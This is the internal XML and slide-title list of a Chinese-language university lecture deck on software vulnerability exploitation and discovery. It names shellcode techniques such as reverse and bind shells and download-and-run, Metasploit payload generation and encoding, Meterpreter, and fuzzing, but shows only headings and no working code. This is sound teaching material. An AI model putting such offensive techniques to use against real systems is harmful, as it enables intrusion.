            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1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18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latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发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atin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>编写语言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>地址重定位技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>函数搜索技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>编码问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="40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16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Char char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>典型功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>正向连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1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3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>反向连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1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3600" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>下载并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/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3600" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>生成可执行文件并运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0"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65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2730</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>486</Paragraphs>
  <Slides>64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65" baseType="lpstr">
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>4  软件漏洞的利用和发现</vt:lpstr>
      <vt:lpstr>4.1 漏洞利用与Exploit</vt:lpstr>
      <vt:lpstr>漏洞利用过程</vt:lpstr>
      <vt:lpstr>Exploit结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>例子</vt:lpstr>
      <vt:lpstr>Exploit利用技术</vt:lpstr>
      <vt:lpstr>4.2 Shellcode开发</vt:lpstr>
      <vt:lpstr>Shellcode典型功能</vt:lpstr>
      <vt:lpstr>Shellcode改进技术</vt:lpstr>
      <vt:lpstr>Shellcode Development</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>What can Shellcode do?</vt:lpstr>
      <vt:lpstr>Tools for Shellcode development</vt:lpstr>
      <vt:lpstr>Next ( Femi )</vt:lpstr>
      <vt:lpstr>Understanding Shellcode</vt:lpstr>
      <vt:lpstr>Machine Architecture</vt:lpstr>
      <vt:lpstr>Program Flow Dynamics</vt:lpstr>
      <vt:lpstr>Program Flow Dynamics (cont)</vt:lpstr>
      <vt:lpstr>Stack Based Buffer Overflow</vt:lpstr>
      <vt:lpstr>Developing Shellcode</vt:lpstr>
      <vt:lpstr>Example – Spawning a Shell</vt:lpstr>
      <vt:lpstr>Example – Spawning a Shell cont’</vt:lpstr>
      <vt:lpstr>Methods for Detecting Shellcode</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>4.3 软件漏洞利用平台及框架</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>MSF Architecture</vt:lpstr>
      <vt:lpstr>MSF Components</vt:lpstr>
      <vt:lpstr>MSF Libraries</vt:lpstr>
      <vt:lpstr>Metasploit Interfaces</vt:lpstr>
      <vt:lpstr>MSF Modules</vt:lpstr>
      <vt:lpstr>MSF Utilities</vt:lpstr>
      <vt:lpstr>MSF Plugins</vt:lpstr>
      <vt:lpstr>MSF Plugins – Cont.</vt:lpstr>
      <vt:lpstr>MSF Plugins – Cont.</vt:lpstr>
      <vt:lpstr>MSF Core Commands</vt:lpstr>
      <vt:lpstr>MSF Core Commands - 2</vt:lpstr>
      <vt:lpstr>MSF Core Commands - 3</vt:lpstr>
      <vt:lpstr>MSF Database</vt:lpstr>
      <vt:lpstr>MSF DB Basic Usage</vt:lpstr>
      <vt:lpstr>DB Tips</vt:lpstr>
      <vt:lpstr>Auxiliary Modules</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Payloads Types</vt:lpstr>
      <vt:lpstr>Generating Shellcode using msfconsole</vt:lpstr>
      <vt:lpstr>Generating Shellcode using msfpayload</vt:lpstr>
      <vt:lpstr>Creating Executable Files</vt:lpstr>
      <vt:lpstr>Encode Executables -1</vt:lpstr>
      <vt:lpstr>Encode Executables -2</vt:lpstr>
      <vt:lpstr>multi/handler Exploit</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>4.4 软件漏洞挖掘技术及工具</vt:lpstr>
      <vt:lpstr>基于源代码的静态分析</vt:lpstr>
      <vt:lpstr>静态分析工具</vt:lpstr>
      <vt:lpstr>动态分析</vt:lpstr>
      <vt:lpstr>Fuzzing测试</vt:lpstr>
      <vt:lpstr>文件类型漏洞挖掘</vt:lpstr>
      <vt:lpstr>Web Fuzz测试</vt:lpstr>
      <vt:lpstr>FTP漏洞挖掘</vt:lpstr>
      <vt:lpstr>二进制逆向分析</vt:lpstr>
      <vt:lpstr>基于补丁对比的逆向分析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 软件漏洞的利用和发现</dc:title>
  <dc:creator>ch</dc:creator>
  <cp:lastModifiedBy>ch</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-06T11:47:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-14T11:01:27Z</dcterms:modified>
</cp:coreProperties>
</file>